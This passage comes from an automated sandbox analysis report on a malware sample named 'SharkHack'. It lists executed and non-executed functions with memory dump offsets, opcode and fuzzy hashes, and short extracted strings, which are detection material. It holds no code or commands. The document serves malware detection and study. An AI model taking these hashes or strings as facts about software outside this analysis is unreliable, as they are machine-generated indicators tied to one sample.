                                                                                                          • Instruction ID: a2a84daa0ae2b2a770019d8de4d5abbff7646c4b6dbb0a0876dd33b511863041
                                                                                                          • Opcode Fuzzy Hash: 127b290c199ddb9e79e85e71259860f7793ff4afc3784ab8d56800eee06ab797
                                                                                                          • Instruction Fuzzy Hash: 0CE0E35599E3D00FC713977459AA0987FB0AD0312071A84CBD994CF4B3DA68485EC363
                                                                                                          Function 08742990 Relevance: .0, Instructions: 23COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2889664682.0000000008740000.00000040.00000800.00020000.00000000.sdmp, Offset: 08740000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_8740000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: e96887060e85d7d14b88bd184f355d0728fade1ab18192c0c370aeed1972c9be
                                                                                                          • Instruction ID: dea2c75748c1f245ddd071766d804ab8f07b72a6abb7220b901689968c8cbe5e
                                                                                                          • Opcode Fuzzy Hash: e96887060e85d7d14b88bd184f355d0728fade1ab18192c0c370aeed1972c9be
                                                                                                          • Instruction Fuzzy Hash: 8CE0EC363045146FC3149A4EEC88D46FBEDEFD9771B55806AFA09C7361CA71AC05CAA4
                                                                                                          Function 0874D82B Relevance: .0, Instructions: 22COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2889664682.0000000008740000.00000040.00000800.00020000.00000000.sdmp, Offset: 08740000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_8740000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: b9db0bac69f66d717d041f8d539e26c384620f27b7c607c94e3327d36ca05dd5
                                                                                                          • Instruction ID: a5c31f2771c2f5b2f95e59adbfec62e201aafb76c7f47e8322ae5577bce69065
                                                                                                          • Opcode Fuzzy Hash: b9db0bac69f66d717d041f8d539e26c384620f27b7c607c94e3327d36ca05dd5
                                                                                                          • Instruction Fuzzy Hash: 7EE01AB67422008FC744EF38F9984187BE1FF4921A31545E9E80ACB332DB359C21CB50

                                                                                                          Non-executed Functions

                                                                                                          Function 08EF0040 Relevance: 11.0, Strings: 8, Instructions: 976COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2890193084.0000000008EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08EF0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_8ef0000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: (bq$Hbq$Hbq$Hbq$Hbq$Hbq$Hbq$PH^q
                                                                                                          • API String ID: 0-3076519024
                                                                                                          • Opcode ID: 096e19d9cd4a1cb3acb7ac297f1266138185858c63eacc7a9608158291754a68
                                                                                                          • Instruction ID: dc44e1c9299be84c66d18970ef5fafffdd68bf87a542444a70183407c84008be
                                                                                                          • Opcode Fuzzy Hash: 096e19d9cd4a1cb3acb7ac297f1266138185858c63eacc7a9608158291754a68
                                                                                                          • Instruction Fuzzy Hash: 3072CD31B406448FCB54EB78C89466E7BA6BFC8311F248569E14ADB3A6CF34DC46C791
                                                                                                          Function 089C53D9 Relevance: 5.3, Strings: 4, Instructions: 282COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2889924060.00000000089C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089C0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_89c0000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: #HBF$A{]z$w*S$}\%G
                                                                                                          • API String ID: 0-2096210196
                                                                                                          • Opcode ID: 367dc34e83d21e02cca18788a3ef8c9c8ce7c365436c536f23bcabc679e97fda
                                                                                                          • Instruction ID: 7572e43840d8b47f423f2091b528d72b99f2a8a535ceb2cf5c34897e307380f3
                                                                                                          • Opcode Fuzzy Hash: 367dc34e83d21e02cca18788a3ef8c9c8ce7c365436c536f23bcabc679e97fda
                                                                                                          • Instruction Fuzzy Hash: DCC12474E0520ADFCB04DFA9C5809EEFBF2FB88311F24952AD415BB214D335AA418B66
                                                                                                          Function 089C4E08 Relevance: 3.9, Strings: 3, Instructions: 153COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2889924060.00000000089C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089C0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_89c0000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: @$@$@
                                                                                                          • API String ID: 0-1615930675
                                                                                                          • Opcode ID: 57dc1c0f318dfb1105eb9372d3e69a759b3acffb3a22e516a633826b6c84dd97
                                                                                                          • Instruction ID: c7e3374e33a9ee8560479ce95abd9d341a200442a2099c73ef7c0389bf5aa747
                                                                                                          • Opcode Fuzzy Hash: 57dc1c0f318dfb1105eb9372d3e69a759b3acffb3a22e516a633826b6c84dd97
                                                                                                          • Instruction Fuzzy Hash: 42612AB0E0120ADFCB04DFAAC5916EEFBB2BF88301F14941AD425B7244D7359A81CF99
                                                                                                          Function 089C4E00 Relevance: 3.9, Strings: 3, Instructions: 147COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2889924060.00000000089C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089C0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_89c0000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: @$@$@
                                                                                                          • API String ID: 0-1615930675
                                                                                                          • Opcode ID: 5b596c23a983cb42cdedf303862b214fc0c1e1cf49d8993bae3b1acb93254cfe
                                                                                                          • Instruction ID: 4ee2bf1477e8996c3b2e00775a5ddddfddcc361fea5bc9dfb3bc9abc1b948418
                                                                                                          • Opcode Fuzzy Hash: 5b596c23a983cb42cdedf303862b214fc0c1e1cf49d8993bae3b1acb93254cfe
                                                                                                          • Instruction Fuzzy Hash: 5B513C70E0120ADFCB04DFA9C5915EEFBB2BF88301F15C56AD429A7244D7359A81CF99
                                                                                                          Function 059D5AD8 Relevance: 2.8, Strings: 2, Instructions: 298COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2880619802.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_59d0000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: PH^q$PH^q
                                                                                                          • API String ID: 0-1598597984
                                                                                                          • Opcode ID: e8934f06159be5c633b66bdbf7b263706ded4da1f3de3ee2cacf9a41d573b23f
                                                                                                          • Instruction ID: 2e8162854cb2cbad1059ede7b75fefeb704062648ce29b9da0eb547dc2211b94
                                                                                                          • Opcode Fuzzy Hash: e8934f06159be5c633b66bdbf7b263706ded4da1f3de3ee2cacf9a41d573b23f
                                                                                                          • Instruction Fuzzy Hash: AFD1A634A006088FDB14DF69D598EA9B7F6BF4D701F2680A9E406EB361DB31AD41CF60
                                                                                                          Function 01F9C0B8 Relevance: 2.8, Strings: 2, Instructions: 265COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2851633688.0000000001F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F90000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_1f90000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: Xbq$$^q
                                                                                                          • API String ID: 0-1593437937
                                                                                                          • Opcode ID: a76fec9dc8c9f1cfd9bd37978d4e4df58a301ec39dd574c18bf9fab2c9b297ef
                                                                                                          • Instruction ID: 096907f3c1fa1f52ad880097f6454339a1b0bd696e3d9c6050b43aad772b5d7f
                                                                                                          • Opcode Fuzzy Hash: a76fec9dc8c9f1cfd9bd37978d4e4df58a301ec39dd574c18bf9fab2c9b297ef
                                                                                                          • Instruction Fuzzy Hash: AA91B575F002189BEF18EB7A945467E7BB7BFC9740B08892DE446E7398CE3589028791
                                                                                                          Function 059D09E0 Relevance: 2.7, Strings: 2, Instructions: 185COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2880619802.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_59d0000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: 4|cq$Y|?
                                                                                                          • API String ID: 0-2893176855
                                                                                                          • Opcode ID: ff2e081bcf410a35fcf09658ed1d8508cb4a0be1337ec0dc2a1bc037665484ca
                                                                                                          • Instruction ID: edf58446baa8959ba16f23322a42b10e919e6ca509cb2179007b960ec53c8f96
                                                                                                          • Opcode Fuzzy Hash: ff2e081bcf410a35fcf09658ed1d8508cb4a0be1337ec0dc2a1bc037665484ca
                                                                                                          • Instruction Fuzzy Hash: F98119B1E052198BEB58CF6AC850B9DFBB2BF88300F14C5AAD509A7354EB345A85CF51
                                                                                                          Function 089C53E8 Relevance: 2.7, Strings: 2, Instructions: 167COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2889924060.00000000089C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089C0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_89c0000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: #HBF$#HBF
                                                                                                          • API String ID: 0-136798975
                                                                                                          • Opcode ID: 54e893b74f0b73716fb5d73b72c09d3a4a8d2a37ced8fd6ed91f8422d6c29b88
                                                                                                          • Instruction ID: 5d588448d5e52605640eef7f1a233b7192baf6ac9a0b40928dc974024a7d09fa
                                                                                                          • Opcode Fuzzy Hash: 54e893b74f0b73716fb5d73b72c09d3a4a8d2a37ced8fd6ed91f8422d6c29b88
                                                                                                          • Instruction Fuzzy Hash: 3C61F374E15609DFCB08CFA9C5845EEFBF2FF88211F25942AD415BB214D731AA018B66
                                                                                                          Function 089C51A0 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2889924060.00000000089C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089C0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_89c0000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: A{]z$}\%G
                                                                                                          • API String ID: 0-4271377017
                                                                                                          • Opcode ID: 9132ad4ce16e606bdeb38624c0f68402c0b72363d973b69f43be8e618724b055
                                                                                                          • Instruction ID: e15e826a7ebf4233953f9199dfbeaac35c151998771b46469fe0bd7e3e3a8748
                                                                                                          • Opcode Fuzzy Hash: 9132ad4ce16e606bdeb38624c0f68402c0b72363d973b69f43be8e618724b055
                                                                                                          • Instruction Fuzzy Hash: A6412E70E0420ADFDB04DFAAC4805EEFBF2BF89311F24D56AC415A7254E335A6428F55
                                                                                                          Function 089C51B0 Relevance: 2.6, Strings: 2, Instructions: 113COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2889924060.00000000089C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089C0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_89c0000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: A{]z$}\%G
                                                                                                          • API String ID: 0-4271377017
                                                                                                          • Opcode ID: 92788ab2f6499621cbcf55aadbde662ae3fd112867d3973b391c0c9b0f215926
                                                                                                          • Instruction ID: 25b0d7be64dff6c983b31dea7629c21e4636efcfca48a0630ff96b6a10c56ccf
                                                                                                          • Opcode Fuzzy Hash: 92788ab2f6499621cbcf55aadbde662ae3fd112867d3973b391c0c9b0f215926
                                                                                                          • Instruction Fuzzy Hash: 5441ECB0E0420ADFDB44DFAAC4805AEFBF2BF88311F24D52AC415B7254E775A6418F95
                                                                                                          Function 089C4B08 Relevance: 1.4, Strings: 1, Instructions: 160COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2889924060.00000000089C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089C0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_89c0000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: yS^Z
                                                                                                          • API String ID: 0-4128205011
                                                                                                          • Opcode ID: 8883b416a7b7e43e6da260ae127e9006faa87f731736326dec511fbe3e6f3c9e
                                                                                                          • Instruction ID: 3e0e65ff3f01bbc40a675382f9323b3ce51f190655dd94086440027578493fe4
                                                                                                          • Opcode Fuzzy Hash: 8883b416a7b7e43e6da260ae127e9006faa87f731736326dec511fbe3e6f3c9e
                                                                                                          • Instruction Fuzzy Hash: 7771F2B4E0420ADFCB44DF99C5809AEFFB2FF88311F14955AD415AB214C731A982CF9A
                                                                                                          Function 089C4B00 Relevance: 1.4, Strings: 1, Instructions: 152COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2889924060.00000000089C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089C0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_89c0000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: yS^Z
                                                                                                          • API String ID: 0-4128205011
                                                                                                          • Opcode ID: 43ca03d1c4bc3dee06dcd4c459ee1cacf81f2f07de847daa60832227fd03cc61
                                                                                                          • Instruction ID: f1227fb0f1148db28311b600da149f24f26331b9e94fc1fe8b5ea912f7d8146f
                                                                                                          • Opcode Fuzzy Hash: 43ca03d1c4bc3dee06dcd4c459ee1cacf81f2f07de847daa60832227fd03cc61
                                                                                                          • Instruction Fuzzy Hash: 9F61F1B4E0020ADFCB04DFA9C4949AEFFB2BF88311F14951AD425A7310D731A982CF99
                                                                                                          Function 059D42B0 Relevance: .6, Instructions: 640COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2880619802.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_59d0000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: c58454561fc252490f5e66b8af6e15c2861e7508ddfb32496d03bf35310d3f36
                                                                                                          • Instruction ID: e1c179ab7a2e8dae0106eda4de232154212b60d7c4d3f2eb4cc492ca52ae3693
                                                                                                          • Opcode Fuzzy Hash: c58454561fc252490f5e66b8af6e15c2861e7508ddfb32496d03bf35310d3f36
                                                                                                          • Instruction Fuzzy Hash: 6132AC35B012048FDB15DF69C594BAEB7FABF89700F1484A9E14A9B3A0CB75EC01CB61
                                                                                                          Function 059D45C8 Relevance: .3, Instructions: 319COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2880619802.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_59d0000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 2e78a5628e0cd5262acd0e0e151a3fd54f0f422603575e1cdfef678121973240
                                                                                                          • Instruction ID: 502252215e829ff8c42ec957a72ae570338a4909b781d20add1fe7b036742a25
                                                                                                          • Opcode Fuzzy Hash: 2e78a5628e0cd5262acd0e0e151a3fd54f0f422603575e1cdfef678121973240
                                                                                                          • Instruction Fuzzy Hash: 8BC1AE35B007048FDB26DF75C554BAEB7FAAF89700F14846DD28A9B290CB75E901CB61
                                                                                                          Function 087403F1 Relevance: .3, Instructions: 271COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2889664682.0000000008740000.00000040.00000800.00020000.00000000.sdmp, Offset: 08740000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_8740000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: cdbc37fc17a7dd86b37aab4e4e3c564bba19017c97066b04740e0b7bec67328f
                                                                                                          • Instruction ID: e9696d296ec1061917e598f510ed717f73dfb005e5f1ea6e2062d8da2b607cf5
                                                                                                          • Opcode Fuzzy Hash: cdbc37fc17a7dd86b37aab4e4e3c564bba19017c97066b04740e0b7bec67328f
                                                                                                          • Instruction Fuzzy Hash: 48D10835C2075A8ACB50EF64D990A9DB7B1FF95300F50879AD1493B221FBB06EC9CB91
                                                                                                          Function 089CDD98 Relevance: .3, Instructions: 264COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2889924060.00000000089C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089C0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_89c0000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: ac5ebfaad73796794acf3acf8edc01c9801c00ab4a40c2e70a54bfde8074e689
                                                                                                          • Instruction ID: 138662707cd14a99890496301941cdc598fc5d5b8e33cdd8f536465f0d787593
                                                                                                          • Opcode Fuzzy Hash: ac5ebfaad73796794acf3acf8edc01c9801c00ab4a40c2e70a54bfde8074e689
                                                                                                          • Instruction Fuzzy Hash: E1B14470E15219CFDF48DFA5D98469EFBB2FB89301F20992AC40ABB254D7359901CF29
                                                                                                          Function 08740400 Relevance: .3, Instructions: 264COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2889664682.0000000008740000.00000040.00000800.00020000.00000000.sdmp, Offset: 08740000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_8740000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 4644ac6cabb2a5b1c91ce5867f2723e6cad93e9732c4efc764dd2e8942c000cb
                                                                                                          • Instruction ID: f187acec82fd622948b8d69670b985cc5aedad99ddf13e33823718eb3a38a598
                                                                                                          • Opcode Fuzzy Hash: 4644ac6cabb2a5b1c91ce5867f2723e6cad93e9732c4efc764dd2e8942c000cb
                                                                                                          • Instruction Fuzzy Hash: 41D1D835C2075A8ACB54EF64D990A9DB7B1FF95300F50879AD1493B220FBB06EC9CB91
                                                                                                          Function 089CE500 Relevance: .2, Instructions: 215COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2889924060.00000000089C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089C0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_89c0000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: b45c33c8951a5988556b9800768bd4afd825b30e9c6cddccb54f0164ca36a5b8
                                                                                                          • Instruction ID: d400d1fd2f9ee0b0bd656705c8e7742623d6b04e229a220d7ae266066fb8091f
                                                                                                          • Opcode Fuzzy Hash: b45c33c8951a5988556b9800768bd4afd825b30e9c6cddccb54f0164ca36a5b8
                                                                                                          • Instruction Fuzzy Hash: F1A16B70E15219DFCB14DFA9C580AAEFBB2FB88301F24D1A9E409A7255DB319E41CF61
                                                                                                          Function 089C6308 Relevance: .2, Instructions: 190COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2889924060.00000000089C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089C0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_89c0000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 51dea3a2c6b1e3a3b248674f89cfe0ef9e50ab1a91d0c0cfd27ebd56319129cc
                                                                                                          • Instruction ID: 9344faf4e895b996bdd309544564a36a59becac76c6fe842913478f686c0e923
                                                                                                          • Opcode Fuzzy Hash: 51dea3a2c6b1e3a3b248674f89cfe0ef9e50ab1a91d0c0cfd27ebd56319129cc
                                                                                                          • Instruction Fuzzy Hash: A6719CB1D012548BDF1ACF2BD884299BFB3AFC5314F18C0AED408AA226DBB50995DF11
                                                                                                          Function 089CCBA0 Relevance: .2, Instructions: 180COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2889924060.00000000089C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089C0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_89c0000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: dbc7163cdd4c04dae4b7803d9adb142678280439a92303a1a2a0e55ff5e37228
                                                                                                          • Instruction ID: 8eb8b98437fabd243bc8901602d5178a04616605dce48a242dafea31d973f67a
                                                                                                          • Opcode Fuzzy Hash: dbc7163cdd4c04dae4b7803d9adb142678280439a92303a1a2a0e55ff5e37228
                                                                                                          • Instruction Fuzzy Hash: E9815970E012198FCB14DFA9D980A9EBBB2FF89305F24D5AAE409A7215DB309A41CF51
                                                                                                          Function 089C4018 Relevance: .2, Instructions: 179COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2889924060.00000000089C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089C0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_89c0000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: c055aa8f2b1d88fe5bb2e41813559efa379860c31d6710e15a302bc71c02dc4e
                                                                                                          • Instruction ID: 3935ea3c912decdf98066d12287e10fc1b2d70559f2cbb5038b519667fcf91e9
                                                                                                          • Opcode Fuzzy Hash: c055aa8f2b1d88fe5bb2e41813559efa379860c31d6710e15a302bc71c02dc4e
                                                                                                          • Instruction Fuzzy Hash: 11710434E121099FCB44CFA9D58499EFBF1FF88311F14896AE419AB320D731AA41CF95
                                                                                                          Function 089C4028 Relevance: .2, Instructions: 174COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2889924060.00000000089C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089C0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_89c0000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 3be0c7a949d29e4d07fbc44562fd537be190cff29812bb73ebc39cfd1820adab
                                                                                                          • Instruction ID: cd6db6667f484f678710f36a487a709bbb5e3f7694625e06e48f9fd5a9f8fc6d
                                                                                                          • Opcode Fuzzy Hash: 3be0c7a949d29e4d07fbc44562fd537be190cff29812bb73ebc39cfd1820adab
                                                                                                          • Instruction Fuzzy Hash: 72710334E121099FCB08CF99D58099EFBF1FF88311F14896AE419AB320D730AA41CF95
                                                                                                          Function 089C9B50 Relevance: .1, Instructions: 129COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2889924060.00000000089C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089C0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_89c0000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 70f42b13da314a8bb96db66aa22e8f79516cad8f0cbe58da145c27a95087ac13
                                                                                                          • Instruction ID: 5c2db807e3c8f3ce3831444aeaa70b26ebf70fa471258cb2a3fc87ce76b45ad4
                                                                                                          • Opcode Fuzzy Hash: 70f42b13da314a8bb96db66aa22e8f79516cad8f0cbe58da145c27a95087ac13
                                                                                                          • Instruction Fuzzy Hash: 02516970E011198BCB14DFAAC9806AEFBF2FB88301F24D56AD409A7205DB319A42CF61
                                                                                                          Function 089C63B8 Relevance: .1, Instructions: 114COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2889924060.00000000089C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089C0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_89c0000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 0451b2ee2a5ba5d79842cf20b92f1ec296d86cd659a218825d8413700c0289a9
                                                                                                          • Instruction ID: 84b9dbf06624fc2a245c332e7044703382d0746f6d757e868d9e515f008fd6ff
                                                                                                          • Opcode Fuzzy Hash: 0451b2ee2a5ba5d79842cf20b92f1ec296d86cd659a218825d8413700c0289a9
                                                                                                          • Instruction Fuzzy Hash: F05159B1E016188BDB68DF6B894479EFBF7BFC8301F14C1BA950CA6214EB701A858F11
                                                                                                          Function 059D09D0 Relevance: .1, Instructions: 111COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2880619802.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_59d0000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: e91cb873128310a7c9ecb12779f64a6e5f83523a0717244685e72598ed2f429b
                                                                                                          • Instruction ID: acc4c963734e02e4b056b7a394c3d4a51f8e567d48eaec2b9434876390a92c8a
                                                                                                          • Opcode Fuzzy Hash: e91cb873128310a7c9ecb12779f64a6e5f83523a0717244685e72598ed2f429b
                                                                                                          • Instruction Fuzzy Hash: D741F4B1E016188BEB58CFAAD89479EFAF2AF88304F14C06AD508A7355EF741945CF50
                                                                                                          Function 089C5651 Relevance: .1, Instructions: 98COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2889924060.00000000089C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089C0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_89c0000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: c7c989a16086390a02f4eb005f9eb765ec993cd97ea43aafb226815cef4b6116
                                                                                                          • Instruction ID: 9d04938f08bf7126eb0c1f4b6fb5f753d70295d306ed5e35699d663fa4ffbad9
                                                                                                          • Opcode Fuzzy Hash: c7c989a16086390a02f4eb005f9eb765ec993cd97ea43aafb226815cef4b6116
                                                                                                          • Instruction Fuzzy Hash: B34127B4E0160ADFCB04DFAAD5815AEFBF2BF88300F25C46AD405B7254D731AA41CB95
                                                                                                          Function 089C5660 Relevance: .1, Instructions: 96COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
